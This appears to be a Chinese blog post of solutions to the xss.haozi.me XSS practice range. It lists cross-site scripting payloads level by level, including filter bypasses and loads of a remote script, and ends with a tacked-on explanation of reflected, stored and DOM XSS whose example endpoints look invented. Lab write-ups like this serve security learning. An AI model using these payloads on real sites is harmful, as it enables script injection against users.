xss.haozi.me靶场

靶场链接:https://xss.haozi.me/#/0x00

0x00

<script>alert(1);</script>

0x01

</textarea><script>alert(1);</script>

0x02

方法一 "></textarea><script>alert(1);</script>
方法二 " onclick="alert(1);
方法三 " onmouseover="alert(1);

0x03

<script>alert `1`;</script>

0x04

<input type="name" value="" onmouseover="alert&#40;1&#41;">

0x05

--!><script>alert(1);</script>

0x06

onmouseover
="alert(1);"

0x07

<body onload="alert(1);"

0x08

</style ><script>alert(1);</script>

0x09

https://www.segmentfault.com" onerror="alert(1);

0x0A

https://www.segmentfault.com@xss.haozi.me/j.js

0x0B

<script src="https://xss.haozi.me/j.js"></script>

0x0C

<scrscriptipt src="https://xss.haozi.me/j.js"></scrscriptipt>

0x0D


alert(1);
-->

0x0E

<ſcript src="https://xss.haozi.me/j.js"></script>
古英文ſ大写后为S

0x0F

'); alert('1

0x10

方法一 0;alert(1);
方法二 '';alert(1);

0x11

");alert("1

0x12

\");alert(1);//
要对xss.haozi.me进行渗透测试需在合法合规且获得授权的情况下进行,以下是一些利用JavaScript进行XSS(跨站脚本攻击)测试的示例方法。 ### 反射型XSS测试 反射型XSS是指攻击者构造的恶意脚本通过URL参数等方式传递给网站,网站将该参数内容原样返回给浏览器执行。 #### 测试思路 构造包含JavaScript代码的URL参数,访问目标网站,看是否能触发脚本执行。 #### 示例代码 ```javascript // 构造一个简单的弹窗测试 const maliciousUrl = 'https://xss.haozi.me/?input=<script>alert("XSS Test")</script>'; window.location.href = maliciousUrl; ``` ### 存储型XSS测试 存储型XSS是指攻击者提交的恶意脚本被存储在网站的数据库中,当其他用户访问包含该恶意脚本的页面时,脚本会自动执行。 #### 测试思路 通过表单等方式向网站提交包含JavaScript代码的数据,然后访问相关页面,看是否能触发脚本执行。 #### 示例代码 ```javascript // 模拟表单提交 const formData = new FormData(); formData.append('message', '<script>alert("Stored XSS Test")</script>'); fetch('https://xss.haozi.me/submit', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { console.log(data); // 提交成功后,访问包含提交内容的页面 window.location.href = 'https://xss.haozi.me/view'; }) .catch(error => console.error('Error:', error)); ``` ### DOM型XSS测试 DOM型XSS是指通过修改页面的DOM结构来注入恶意脚本。 #### 测试思路 构造包含JavaScript代码的URL参数,利用页面中存在的DOM操作将该参数内容插入到页面中,看是否能触发脚本执行。 #### 示例代码 ```javascript // 模拟DOM操作 const url = new URL(window.location.href); const input = url.searchParams.get('input'); if (input) { const element = document.createElement('div'); element.innerHTML = input; document.body.appendChild(element); } // 构造恶意URL进行测试 const maliciousUrl = 'https://xss.haozi.me/?input=<script>alert("DOM XSS Test")</script>'; window.location.href = maliciousUrl; ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值